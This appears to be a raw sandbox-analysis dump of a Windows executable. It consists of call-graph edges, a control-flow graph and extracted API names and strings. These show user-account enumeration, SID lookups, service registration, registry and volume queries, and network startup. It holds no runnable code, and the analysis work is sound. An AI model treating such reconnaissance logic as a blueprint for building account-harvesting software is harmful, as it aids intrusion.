strlen 45172->45175 45176 7ffe115014f8 strlen fopen 45173->45176 45177 7ffe115014d8 strcat strlen 45173->45177 45178 7ffe11501586 45174->45178 45175->45173 45179 7ffe1150165d 45176->45179 45180 7ffe11501547 45176->45180 45177->45176 45178->44708 45186 7ffe11507ab4 45178->45186 45181 7ffe11501292 6 API calls 45179->45181 45182 7ffe11501292 6 API calls 45180->45182 45181->45168 45183 7ffe11501561 45182->45183 45183->45168 45184 7ffe115016cd 45183->45184 45185 7ffe11501292 6 API calls 45184->45185 45185->45178 45187 7ffe11507b19 45186->45187 45188 7ffe11507ad6 45186->45188 45190 7ffe11501292 6 API calls 45187->45190 45267 7ffe11507720 45188->45267 45193 7ffe11507aef 45190->45193 45192 7ffe11507b49 _errno _strtoui64 _errno 45192->45193 45194 7ffe11507b7c _errno 45192->45194 45193->44709 45196 7ffe11503420 45193->45196 45195 7ffe11501292 6 API calls 45194->45195 45195->45193 45309 7ffe11509ff4 45196->45309 45200 7ffe11503487 FreeLibrary 45203 7ffe115034e7 GetNativeSystemInfo GetWindowsDirectoryA 45200->45203 45224 7ffe115034bd 45200->45224 45202 7ffe11501292 6 API calls 45204 7ffe115034d9 45202->45204 45206 7ffe11503526 GetLastError 45203->45206 45207 7ffe115035fe 45203->45207 45204->44708 45210 7ffe11501292 6 API calls 45206->45210 45208 7ffe11501292 6 API calls 45207->45208 45211 7ffe1150361f 45208->45211 45209 7ffe11501292 6 API calls 45209->45200 45210->45224 45211->45224 45325 7ffe11508702 45211->45325 45213 7ffe11501292 6 API calls 45220 7ffe1150365b 45213->45220 45214 7ffe1150366b GetVolumeInformationA 45215 7ffe115037cb 45214->45215 45216 7ffe115036ce GetLastError 45214->45216 45217 7ffe11501292 6 API calls 45215->45217 45218 7ffe11501292 6 API calls 45216->45218 45219 7ffe115037e8 45217->45219 45218->45220 45221 7ffe11503811 45219->45221 45222 7ffe115037ff strlen 45219->45222 45220->45213 45220->45214 45220->45224 45225 7ffe11501292 6 API calls 45221->45225 45222->45221 45223 7ffe115038d3 45222->45223 45223->45221 45226 7ffe115038e7 _errno 45223->45226 45224->45202 45225->45204 45232 7ffe11502dfa 45231->45232 45233 7ffe11502e22 45231->45233 45235 7ffe11501292 6 API calls 45232->45235 45234 7ffe11501292 6 API calls 45233->45234 45236 7ffe11502e3b 45234->45236 45237 7ffe11502e14 45235->45237 45238 7ffe11501292 6 API calls 45236->45238 45237->44709 45239 7ffe11501d21 InitializeCriticalSectionAndSpinCount 45237->45239 45238->45237 45240 7ffe11501d46 CreateThread 45239->45240 45241 7ffe11501dc4 GetLastError 45239->45241 45243 7ffe11501e9c GetLastError 45240->45243 45244 7ffe11501d92 45240->45244 45242 7ffe11501292 6 API calls 45241->45242 45246 7ffe11501d9f 45242->45246 45247 7ffe11501292 6 API calls 45243->45247 45245 7ffe11501f95 45244->45245 45244->45246 45249 7ffe11501292 6 API calls 45245->45249 45248 7ffe11501292 6 API calls 45246->45248 45247->45246 45250 7ffe11501dbc 45248->45250 45249->45250 45250->44709 45251 7ffe11501aae 45250->45251 45252 7ffe11501abc EnterCriticalSection 45251->45252 45253 7ffe11501ad2 45251->45253 45254 7ffe11501b20 45252->45254 45255 7ffe11501292 6 API calls 45253->45255 45257 7ffe11501b3b 45254->45257 45258 7ffe11501b7e GetProcessHeap HeapAlloc 45254->45258 45256 7ffe11501afb 45255->45256 45261 7ffe11501292 6 API calls 45256->45261 45260 7ffe11501b40 LeaveCriticalSection 45257->45260 45259 7ffe11501bd8 45258->45259 45265 7ffe11501b9d 45258->45265 45263 7ffe11501292 6 API calls 45259->45263 45260->45256 45264 7ffe11501c0c 45260->45264 45262 7ffe11501b75 45261->45262 45262->44709 45263->45265 45266 7ffe11501292 6 API calls 45264->45266 45265->45260 45266->45262 45268 7ffe11507769 45267->45268 45269 7ffe11507731 45267->45269 45271 7ffe11501292 6 API calls 45268->45271 45275 7ffe11507409 45269->45275 45273 7ffe11507748 45271->45273 45273->45192 45273->45193 45276 7ffe1150743c 45275->45276 45277 7ffe11507421 45275->45277 45278 7ffe11501292 6 API calls 45276->45278 45279 7ffe11507426 45277->45279 45280 7ffe1150746f 45277->45280 45286 7ffe11507465 45278->45286 45282 7ffe1150742b 45279->45282 45283 7ffe115074a2 45279->45283 45281 7ffe11501292 6 API calls 45280->45281 45281->45286 45285 7ffe1150750c 45282->45285 45287 7ffe115074e1 strcmp 45282->45287 45284 7ffe11501292 6 API calls 45283->45284 45284->45286 45285->45286 45288 7ffe11507513 45285->45288 45290 7ffe11501292 6 API calls 45286->45290 45287->45282 45289 7ffe11501292 6 API calls 45288->45289 45291 7ffe11507529 45289->45291 45290->45291 45291->45273 45292 7ffe11507590 45291->45292 45293 7ffe115075a8 45292->45293 45294 7ffe115075c3 45292->45294 45295 7ffe115075ad 45293->45295 45296 7ffe115075f6 45293->45296 45297 7ffe11501292 6 API calls 45294->45297 45298 7ffe11507629 45295->45298 45304 7ffe115075b2 45295->45304 45299 7ffe11501292 6 API calls 45296->45299 45306 7ffe115075ec 45297->45306 45300 7ffe11501292 6 API calls 45298->45300 45299->45306 45300->45306 45301 7ffe1150768b 45303 7ffe11507694 45301->45303 45301->45306 45302 7ffe11507668 strcmp 45302->45304 45305 7ffe11501292 6 API calls 45303->45305 45304->45301 45304->45302 45307 7ffe115076b9 45305->45307 45308 7ffe11501292 6 API calls 45306->45308 45307->45273 45308->45307 45310 7ffe1150a002 LoadLibraryA 45309->45310 45311 7ffe1150a02b 45309->45311 45312 7ffe1150a02e GetLastError 45310->45312 45313 7ffe1150a010 45310->45313 45311->45312 45314 7ffe11501292 6 API calls 45312->45314 45315 7ffe11501292 6 API calls 45313->45315 45316 7ffe11503434 45314->45316 45315->45316 45316->45224 45317 7ffe11509f73 45316->45317 45318 7ffe11509f90 GetProcAddress 45317->45318 45319 7ffe11509fc1 45317->45319 45320 7ffe11509fa1 45318->45320 45321 7ffe11509fc6 GetLastError 45318->45321 45319->45321 45322 7ffe11501292 6 API calls 45320->45322 45323 7ffe11501292 6 API calls 45321->45323 45324 7ffe1150344f 45322->45324 45323->45324 45324->45200 45324->45209 45326 7ffe1150872b 45325->45326 45342 7ffe1150878a 45325->45342 45327 7ffe11508734 45326->45327 45328 7ffe115087ed 45326->45328 45330 7ffe11508820 45327->45330 45331 7ffe1150873d 45327->45331 45332 7ffe11501292 6 API calls 45328->45332 45329 7ffe11501292 6 API calls 45345 7ffe115087e3 45329->45345 45333 7ffe11501292 6 API calls 45330->45333 45334 7ffe11508853 45331->45334 45335 7ffe11508746 RegOpenKeyExA 45331->45335 45332->45345 45333->45345 45338 7ffe11501292 6 API calls 45334->45338 45336 7ffe11508886 RegQueryValueExA 45335->45336 45337 7ffe1150876d 45335->45337 45350 7ffe115088b4 45336->45350 45351 7ffe11508907 RegCloseKey 45336->45351 45339 7ffe11501292 6 API calls 45337->45339 45338->45345 45339->45342 45340 7ffe11508b89 45344 7ffe11501292 6 API calls 45340->45344 45342->45329 45342->45345 45343 7ffe11508bac 45347 7ffe11508a29 45344->45347 45345->45340 45346 7ffe115089e6 45345->45346 45346->45343 45348 7ffe11501292 6 API calls 45346->45348 45347->45220 45348->45347 45349 7ffe11501292 6 API calls 45349->45350 45350->45349 45350->45351 45351->45345 45353 7ffe0eb41590 GetLastError 45352->45353 45354 7ffe0eb4146a 45352->45354 45355 7ffe0eb41292 16 API calls 45353->45355 45356 7ffe0eb41770 18 API calls 45354->45356 45365 7ffe0eb41569 45355->45365 45357 7ffe0eb41486 45356->45357 45358 7ffe0eb4e0f1 18 API calls 45357->45358 45359 7ffe0eb4149a 45358->45359 45360 7ffe0eb414a4 strlen 45359->45360 45359->45365 45361 7ffe0eb414d3 45360->45361 45362 7ffe0eb414bd 45360->45362 45367 7ffe0eb414f8 strlen fopen 45361->45367 45368 7ffe0eb414d8 strcat strlen 45361->45368 45362->45361 45366 7ffe0eb414c2 strlen 45362->45366 45363 7ffe0eb41292 16 API calls 45364 7ffe0eb41586 45363->45364 45364->44726 45376 7ffe0eb49004 45364->45376 45365->45363 45366->45361 45369 7ffe0eb41547 45367->45369 45370 7ffe0eb4165d 45367->45370 45368->45367 45371 7ffe0eb41292 16 API calls 45369->45371 45372 7ffe0eb41292 16 API calls 45370->45372 45373 7ffe0eb41561 45371->45373 45372->45365 45373->45365 45374 7ffe0eb416cd 45373->45374 45375 7ffe0eb41292 16 API calls 45374->45375 45375->45364 45377 7ffe0eb49026 45376->45377 45378 7ffe0eb49069 45376->45378 45477 7ffe0eb48c70 45377->45477 45380 7ffe0eb41292 16 API calls 45378->45380 45382 7ffe0eb48491 45380->45382 45382->44734 45386 7ffe0eb4e870 45382->45386 45383 7ffe0eb49099 _errno _strtoui64 _errno 45383->45382 45384 7ffe0eb490cc _errno 45383->45384 45385 7ffe0eb41292 16 API calls 45384->45385 45385->45382 45519 7ffe0eb41aa4 45386->45519 45390 7ffe0eb4e8d7 FreeLibrary 45393 7ffe0eb4e937 GetNativeSystemInfo GetWindowsDirectoryA 45390->45393 45400 7ffe0eb4e90d 45390->45400 45391 7ffe0eb41292 16 API calls 45416 7ffe0eb4e929 45391->45416 45394 7ffe0eb4ea4e 45393->45394 45395 7ffe0eb4e976 GetLastError 45393->45395 45398 7ffe0eb41292 16 API calls 45394->45398 45397 7ffe0eb41292 16 API calls 45395->45397 45397->45400 45401 7ffe0eb4ea6f 45398->45401 45399 7ffe0eb41292 16 API calls 45399->45390 45400->45391 45401->45400 45402 7ffe0eb42472 19 API calls 45401->45402 45403 7ffe0eb4eaab 45402->45403 45403->45400 45404 7ffe0eb41292 16 API calls 45403->45404 45405 7ffe0eb4eabb GetVolumeInformationA 45403->45405 45404->45403 45406 7ffe0eb4eb1e GetLastError 45405->45406 45407 7ffe0eb4ec1b 45405->45407 45408 7ffe0eb41292 16 API calls 45406->45408 45409 7ffe0eb41292 16 API calls 45407->45409 45408->45403 45410 7ffe0eb4ec38 45409->45410 45411 7ffe0eb4ec4f strlen 45410->45411 45412 7ffe0eb4ec61 45410->45412 45411->45412 45413 7ffe0eb4ed23 45411->45413 45414 7ffe0eb41292 16 API calls 45412->45414 45413->45412 45415 7ffe0eb4ed37 _errno 45413->45415 45414->45416 45417 7ffe0eb546f0 45415->45417 45416->44726 45418 7ffe0eb4ed61 _errno 45417->45418 45418->45412 45419 7ffe0eb4ed7a _errno 45418->45419 45420 7ffe0eb41292 16 API calls 45419->45420 45420->45412 45422 7ffe0eb44a42 GetLastError 45421->45422 45423 7ffe0eb449da OpenSCManagerA 45421->45423 45426 7ffe0eb41292 16 API calls 45422->45426 45424 7ffe0eb44a10 45423->45424 45425 7ffe0eb44b1a GetLastError 45423->45425 45427 7ffe0eb44b36 45424->45427 45432 7ffe0eb44a1d 45424->45432 45428 7ffe0eb41292 16 API calls 45425->45428 45426->45432 45429 7ffe0eb41292 16 API calls 45427->45429 45428->45427 45431 7ffe0eb44a3a 45429->45431 45430 7ffe0eb41292 16 API calls 45430->45431 45431->44734 45433 7ffe0eb4595e WSAStartup 45431->45433 45432->45430 45434 7ffe0eb459a2 45433->45434 45435 7ffe0eb4597a 45433->45435 45436 7ffe0eb41292 16 API calls 45434->45436 45437 7ffe0eb41292 16 API calls 45435->45437 45438 7ffe0eb459bb 45436->45438 45440 7ffe0eb45994 45437->45440 45439 7ffe0eb41292 16 API calls 45438->45439 45439->45440 45440->44734 45441 7ffe0eb4f401 InitializeCriticalSectionAndSpinCount 45440->45441 45442 7ffe0eb4f4a4 GetLastError 45441->45442 45443 7ffe0eb4f426 CreateThread 45441->45443 45445 7ffe0eb41292 16 API calls 45442->45445 45444 7ffe0eb4f57c GetLastError 45443->45444 45452 7ffe0eb4f472 45443->45452 45446 7ffe0eb41292 16 API calls 45444->45446 45451 7ffe0eb4f47f 45445->45451 45446->45452 45447 7ffe0eb4f675 45449 7ffe0eb41292 16 API calls 45447->45449 45448 7ffe0eb41292 16 API calls 45450 7ffe0eb484b3 45448->45450 45449->45450 45450->44734 45453 7ffe0eb4785c InitializeCriticalSectionAndSpinCount 45450->45453 45451->45448 45451->45450 45452->45447 45452->45451 45454 7ffe0eb47881 45453->45454 45455 7ffe0eb478b6 GetLastError 45453->45455 45457 7ffe0eb41292 16 API calls 45454->45457 45456 7ffe0eb41292 16 API calls 45455->45456 45460 7ffe0eb478d4 45456->45460 45459 7ffe0eb478a9 45457->45459 45458 7ffe0eb41292 16 API calls 45458->45459 45459->44734 45461 7ffe0eb4f18e 45459->45461 45460->45458 45462 7ffe0eb4f1b2 45461->45462 45463 7ffe0eb4f19c EnterCriticalSection 45461->45463 45465 7ffe0eb41292 16 API calls 45462->45465 45464 7ffe0eb4f200 45463->45464 45467 7ffe0eb4f25e GetProcessHeap HeapAlloc 45464->45467 45468 7ffe0eb4f21b 45464->45468 45466 7ffe0eb4f1db 45465->45466 45471 7ffe0eb41292 16 API calls 45466->45471 45469 7ffe0eb4f2b8 45467->45469 45475 7ffe0eb4f27d 45467->45475 45470 7ffe0eb4f220 LeaveCriticalSection 45468->45470 45472 7ffe0eb41292 16 API calls 45469->45472 45470->45466 45473 7ffe0eb4f2ec 45470->45473 45474 7ffe0eb4f255 45471->45474 45472->45475 45476 7ffe0eb41292 16 API calls 45473->45476 45474->44734 45475->45470 45476->45474 45478 7ffe0eb48c81 45477->45478 45479 7ffe0eb48cb9 45477->45479 45485 7ffe0eb48959 45478->45485 45481 7ffe0eb41292 16 API calls 45479->45481 45483 7ffe0eb48c98 45481->45483 45483->45382 45483->45383 45486 7ffe0eb48971 45485->45486 45487 7ffe0eb4898c 45485->45487 45489 7ffe0eb489bf 45486->45489 45490 7ffe0eb48976 45486->45490 45488 7ffe0eb41292 16 API calls 45487->45488 45495 7ffe0eb489b5 45488->45495 45491 7ffe0eb41292 16 API calls 45489->45491 45492 7ffe0eb489f2 45490->45492 45494 7ffe0eb4897b 45490->45494 45491->45495 45493 7ffe0eb41292 16 API calls 45492->45493 45493->45495 45496 7ffe0eb48a5c 45494->45496 45497 7ffe0eb48a31 strcmp 45494->45497 45499 7ffe0eb41292 16 API calls 45495->45499 45496->45495 45498 7ffe0eb48a63 45496->45498 45497->45494 45500 7ffe0eb41292 16 API calls 45498->45500 45501 7ffe0eb48a79 45499->45501 45500->45501 45501->45483 45502 7ffe0eb48ae0 45501->45502 45503 7ffe0eb48b13 45502->45503 45504 7ffe0eb48af8 45502->45504 45507 7ffe0eb41292 16 API calls 45503->45507 45505 7ffe0eb48afd 45504->45505 45506 7ffe0eb48b46 45504->45506 45508 7ffe0eb48b79 45505->45508 45514 7ffe0eb48b02 45505->45514 45509 7ffe0eb41292 16 API calls 45506->45509 45516 7ffe0eb48b3c 45507->45516 45510 7ffe0eb41292 16 API calls 45508->45510 45509->45516 45510->45516 45511 7ffe0eb48bdb 45513 7ffe0eb48be4 45511->45513 45511->45516 45512 7ffe0eb48bb8 strcmp 45512->45514 45515 7ffe0eb41292 16 API calls 45513->45515 45514->45511 45514->45512 45517 7ffe0eb48c09 45515->45517 45518 7ffe0eb41292 16 API calls 45516->45518 45517->45483 45518->45517 45520 7ffe0eb41ab2 LoadLibraryA 45519->45520 45521 7ffe0eb41adb 45519->45521 45522 7ffe0eb41ac0 45520->45522 45523 7ffe0eb41ade GetLastError 45520->45523 45521->45523 45524 7ffe0eb41292 16 API calls 45522->45524 45525 7ffe0eb41292 16 API calls 45523->45525 45526 7ffe0eb41ad9 45524->45526 45525->45526 45526->45400 45527 7ffe0eb41a23 45526->45527 45528 7ffe0eb41a71 45527->45528 45529 7ffe0eb41a40 GetProcAddress 45527->45529 45531 7ffe0eb41a76 GetLastError 45528->45531 45530 7ffe0eb41a51 45529->45530 45529->45531 45532 7ffe0eb41292 16 API calls 45530->45532 45533 7ffe0eb41292 16 API calls 45531->45533 45534 7ffe0eb41a6f 45532->45534 45533->45534 45534->45390 45534->45399 45536 7ff76a90ab1e 45535->45536 45537 7ff76a90ab35 45535->45537 45541 7ff76a90bb4b fputc 45536->45541 45542 7ff76a90bb4b fputc 45537->45542 45540 7ff76a909a49 45540->44238 45540->44239 45540->44241 45541->45540 45542->45540 45543 7ff76a908a03 45544 7ff76a90849a 116 API calls 45543->45544 45545 7ff76a908a0d 45544->45545 45546 7ff76a908a72 RegisterServiceCtrlHandlerA 45545->45546 45547 7ff76a908a13 45545->45547 45548 7ff76a908a92 45546->45548 45549 7ff76a908ab3 GetLastError 45546->45549 45561 7ff76a908a1b 45547->45561 45565 7ff76a908bff 45547->45565 45574 7ff76a9081e0 SetServiceStatus 45547->45574 45573 7ff76a9081e0 SetServiceStatus 45548->45573 45553 7ff76a9099e2 6 API calls 45549->45553 45552 7ff76a908a3a 45576 7ff76a9088ee 10 API calls 45552->45576 45553->45547 45554 7ff76a908ba6 45558 7ff76a9099e2 6 API calls 45554->45558 45555 7ff76a908aa7 45559 7ff76a908563 249 API calls 45555->45559 45563 7ff76a908bc0 45558->45563 45559->45547 45560 7ff76a908a3f 45577 7ff76a9089aa 13 API calls 45560->45577 45561->45552 45575 7ff76a9081e0 SetServiceStatus 45561->45575 45566 7ff76a908bd6 45563->45566 45572 7ff76a90886d 25 API calls 45563->45572 45564 7ff76a908a44 45567 7ff76a908c3b ExitProcess 45564->45567 45568 7ff76a908a4c 45564->45568 45565->45567 45569 7ff76a9099e2 6 API calls 45566->45569 45570 7ff76a908a6b 45568->45570 45578 7ff76a9081e0 SetServiceStatus 45568->45578 45569->45561 45572->45563 45573->45555 45574->45554 45575->45552 45576->45560 45577->45564 45578->45570 45579 7ffe0e163c88 45611 7ffe0e1638c3 45579->45611 45580 7ffe0e163cd7 wcslen GetProcessHeap HeapAlloc 45580->45611 45581 7ffe0e163d97 NetApiBufferFree 45582 7ffe0e163d87 45581->45582 45582->45581 45583 7ffe0e163ed7 45582->45583 45585 7ffe0e163dba NetUserEnum 45582->45585 45592 7ffe0e163e36 GetProcessHeap HeapAlloc 45582->45592 45587 7ffe0e161292 6 API calls 45583->45587 45605 7ffe0e163ee0 45583->45605 45584 7ffe0e163d48 GetProcessHeap HeapAlloc 45586 7ffe0e163d6c 45584->45586 45584->45611 45585->45582 45589 7ffe0e161292 6 API calls 45586->45589 45586->45611 45587->45605 45588 7ffe0e1638ee LocalAlloc 45588->45611 45589->45586 45590 7ffe0e164014 45593 7ffe0e161292 6 API calls 45590->45593 45591 7ffe0e16379f 8 API calls 45594 7ffe0e163eed 45591->45594 45595 7ffe0e1638a3 45592->45595 45596 7ffe0e163e70 45592->45596 45598 7ffe0e163f0a 45593->45598 45600 7ffe0e161292 6 API calls 45594->45600 45595->45582 45599 7ffe0e161292 6 API calls 45595->45599 45601 7ffe0e163eb5 45596->45601 45602 7ffe0e163e7c memcpy GetProcessHeap HeapFree 45596->45602 45597 7ffe0e16390d wcsncpy 45622 7ffe0e16a05a 45597->45622 45599->45595 45600->45598 45602->45601 45604 7ffe0e163ee8 45604->45591 45605->45590 45605->45604 45607 7ffe0e1639de GetLastError 45610 7ffe0e163a01 LocalAlloc 45607->45610 45607->45611 45608 7ffe0e163995 GetLastError 45612 7ffe0e161292 6 API calls 45608->45612 45609 7ffe0e163b84 ConvertSidToStringSidA 45609->45611 45613 7ffe0e163bd5 GetLastError 45609->45613 45614 7ffe0e163a1f LookupAccountNameW 45610->45614 45615 7ffe0e163b7a 45610->45615 45611->45580 45611->45582 45611->45584 45611->45588 45611->45597 45611->45608 45611->45609 45619 7ffe0e161292 6 API calls 45611->45619 45612->45611 45618 7ffe0e161292 6 API calls 45613->45618 45616 7ffe0e163a53 LocalFree 45614->45616 45617 7ffe0e163a61 GetLastError 45614->45617 45615->45609 45616->45611 45620 7ffe0e161292 6 API calls 45617->45620 45618->45611 45619->45611 45621 7ffe0e163a7f 45620->45621 45621->45616 45623 7ffe0e16a082 wcslen 45622->45623 45624 7ffe0e163937 LookupAccountNameW 45622->45624 45623->45624 45624->45607 45624->45611

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 477 7ffe0e1638c3-7ffe0e1638d9 call 7ffe0e161292 480 7ffe0e163d3e-7ffe0e163d42 477->480 481 7ffe0e1638de 480->481 482 7ffe0e163d48-7ffe0e163d66 GetProcessHeap HeapAlloc 480->482 483 7ffe0e1638e3-7ffe0e1638e8 481->483 482->483 484 7ffe0e163d6c-7ffe0e163d82 call 7ffe0e161292 482->484 485 7ffe0e1639d4-7ffe0e1639d9 483->485 486 7ffe0e1638ee-7ffe0e1638fe LocalAlloc 483->486 484->483 488 7ffe0e163902-7ffe0e163907 485->488 486->488 490 7ffe0e16390d-7ffe0e16398b wcsncpy call 7ffe0e16a05a LookupAccountNameW 488->490 491 7ffe0e163cb9 488->491 499 7ffe0e1639de-7ffe0e1639ea GetLastError 490->499 500 7ffe0e16398d-7ffe0e16398f 490->500 492 7ffe0e163cbe-7ffe0e163cc9 491->492 494 7ffe0e163ccf-7ffe0e163cd1 492->494 495 7ffe0e163d87 492->495 494->495 498 7ffe0e163cd7-7ffe0e163d38 wcslen GetProcessHeap HeapAlloc 494->498 497 7ffe0e163d8d-7ffe0e163d95 495->497 505 7ffe0e163d9c-7ffe0e163dac 497->505 506 7ffe0e163d97 NetApiBufferFree 497->506 498->477 498->480 503 7ffe0e163a01-7ffe0e163a19 LocalAlloc 499->503 504 7ffe0e1639ec-7ffe0e1639ff call 7ffe0e161292 499->504 501 7ffe0e163995-7ffe0e1639b6 GetLastError call 7ffe0e161292 500->501 502 7ffe0e163b84-7ffe0e163b9c ConvertSidToStringSidA 500->502 526 7ffe0e163bfb-7ffe0e163c01 501->526 527 7ffe0e1639bc 501->527 509 7ffe0e163bd5-7ffe0e163bf9 GetLastError call 7ffe0e161292 502->509 510 7ffe0e163b9e-7ffe0e163ba5 502->510 511 7ffe0e163a1f-7ffe0e163a51 LookupAccountNameW 503->511 512 7ffe0e163b7a 503->512 504->501 513 7ffe0e163db2-7ffe0e163db4 505->513 514 7ffe0e163ed7-7ffe0e163ede 505->514 506->505 509->510 517 7ffe0e163c81-7ffe0e163c86 510->517 518 7ffe0e163bab-7ffe0e163bd0 call 7ffe0e161292 510->518 519 7ffe0e163a53-7ffe0e163a5c LocalFree 511->519 520 7ffe0e163a61-7ffe0e163a82 GetLastError call 7ffe0e161292 511->520 512->502 513->514 521 7ffe0e163dba-7ffe0e163e24 NetUserEnum 513->521 523 7ffe0e163ee0-7ffe0e163ee2 514->523 524 7ffe0e163f1d-7ffe0e163f36 call 7ffe0e161292 514->524 517->492 518->492 519->500 547 7ffe0e163a84 520->547 548 7ffe0e163a9c-7ffe0e163aa2 520->548 521->497 530 7ffe0e163e2a-7ffe0e163e30 521->530 532 7ffe0e16402a-7ffe0e164044 call 7ffe0e161292 523->532 533 7ffe0e163ee8-7ffe0e163f05 call 7ffe0e16379f call 7ffe0e161292 523->533 544 7ffe0e163f57-7ffe0e163f5d 524->544 545 7ffe0e163f38 524->545 541 7ffe0e163c8f-7ffe0e163c94 526->541 542 7ffe0e163c07-7ffe0e163c0d 526->542 535 7ffe0e1639c2-7ffe0e163c6a 527->535 536 7ffe0e163c7a-7ffe0e163c7f 527->536 530->497 540 7ffe0e163e36-7ffe0e163e6a GetProcessHeap HeapAlloc 530->540 571 7ffe0e163f0a-7ffe0e163f1c 532->571 533->571 535->492 536->492 549 7ffe0e1638a3-7ffe0e1638be call 7ffe0e161292 540->549 550 7ffe0e163e70-7ffe0e163e7a 540->550 541->492 551 7ffe0e163c0f-7ffe0e163c15 542->551 552 7ffe0e163c39-7ffe0e163c3c 542->552 559 7ffe0e163f63 544->559 560 7ffe0e163fec 544->560 557 7ffe0e163fe2-7ffe0e163fe7 545->557 558 7ffe0e163f3e-7ffe0e163f4b 545->558 563 7ffe0e163b20-7ffe0e163b25 547->563 564 7ffe0e163a8a-7ffe0e163a97 547->564 567 7ffe0e163b34-7ffe0e163b39 548->567 568 7ffe0e163aa8-7ffe0e163aae 548->568 549->497 565 7ffe0e163eb5-7ffe0e163ed2 550->565 566 7ffe0e163e7c-7ffe0e163eaf memcpy GetProcessHeap HeapFree 550->566 569 7ffe0e163cab-7ffe0e163cb0 551->569 570 7ffe0e163c1b-7ffe0e163c21 551->570 555 7ffe0e163c4f-7ffe0e163c55 552->555 556 7ffe0e163c3e-7ffe0e163c41 552->556 574 7ffe0e163ca4-7ffe0e163ca9 555->574 575 7ffe0e163c57-7ffe0e163c5c 555->575 572 7ffe0e163c43-7ffe0e163c46 556->572 573 7ffe0e163c96-7ffe0e163c9b 556->573 557->533 558->544 576 7ffe0e163f65-7ffe0e163f68 559->576 577 7ffe0e163f98-7ffe0e163f9e 559->577 591 7ffe0e163ff6-7ffe0e163ffb 560->591 563->519 564->548 566->565 567->519 579 7ffe0e163ae0-7ffe0e163ae6 568->579 580 7ffe0e163ab0-7ffe0e163ab3 568->580 569->492 581 7ffe0e163cb2-7ffe0e163cb7 570->581 582 7ffe0e163c27-7ffe0e163c2d 570->582 583 7ffe0e163c9d-7ffe0e163ca2 572->583 584 7ffe0e163c48-7ffe0e163c4d 572->584 573->492 574->492 575->492 587 7ffe0e163f6a-7ffe0e163f6d 576->587 588 7ffe0e163f86-7ffe0e163f8c 576->588 589 7ffe0e164014 577->589 590 7ffe0e163fa0-7ffe0e163fa6 577->590 585 7ffe0e163b5c-7ffe0e163b61 579->585 586 7ffe0e163ae8-7ffe0e163aee 579->586 592 7ffe0e163ab5-7ffe0e163ab8 580->592 593 7ffe0e163ace-7ffe0e163ad4 580->593 581->492 594 7ffe0e163c2f-7ffe0e163c34 582->594 595 7ffe0e163c5e-7ffe0e163c63 582->595 583->492 584->492 585->519 600 7ffe0e163af0-7ffe0e163af6 586->600 601 7ffe0e163b66-7ffe0e163b6b 586->601 587->591 602 7ffe0e163f73-7ffe0e163f76 587->602 603 7ffe0e163f8e-7ffe0e163f93 588->603 604 7ffe0e16400a-7ffe0e16400f 588->604 605 7ffe0e16401e 589->605 590->605 606 7ffe0e163fa8-7ffe0e163fae 590->606 591->533 596 7ffe0e163b3e-7ffe0e163b43 592->596 597 7ffe0e163abe-7ffe0e163ac1 592->597 598 7ffe0e163b52-7ffe0e163b57 593->598 599 7ffe0e163ad6-7ffe0e163adb 593->599 594->492 595->492 596->519 607 7ffe0e163ac7-7ffe0e163acc 597->607 608 7ffe0e163b48-7ffe0e163b4d 597->608 598->519 599->519 609 7ffe0e163b70-7ffe0e163b75 600->609 610 7ffe0e163af8-7ffe0e163afd 600->610 601->519 611 7ffe0e164000-7ffe0e164005 602->611 612 7ffe0e163f7c-7ffe0e163f81 602->612 603->533 604->533 605->532 613 7ffe0e163fb0-7ffe0e163fb5 606->613 614 7ffe0e163fba-7ffe0e163fbf 606->614 607->519 608->519 609->519 610->519 611->533 612->533 613->533 614->533
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: AllocErrorLastLocal$AccountCriticalHeapLookupNameSection$CopyEnterFileFreeLeaveProcessfflushfwritewcsncpy
                  • String ID: D$[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x)$[E] (%s) -> ConvertSidToStringSid failed(gle=%lu)$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$sid_to_str$users_sync
                  • API String ID: 3624467404-104752423
                  • Opcode ID: 77f039575536de71df0d3d15065c23e897c673814d0f2d56dbe4c0034cf1c5e9
                  • Instruction ID: b4581d078a970d0cd9a5627759c46edfbd6e021621805fcb8e1c62a1cddd1150
                  • Opcode Fuzzy Hash: 77f039575536de71df0d3d15065c23e897c673814d0f2d56dbe4c0034cf1c5e9
                  • Instruction Fuzzy Hash: 9DF14862A0CA0386FB608B24E44437963A2EBC4B54F654037D9EE477BADF3DE849D741
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Find$ErrorFileLast$CloseFirstNext_mbscpyfflushfwrite
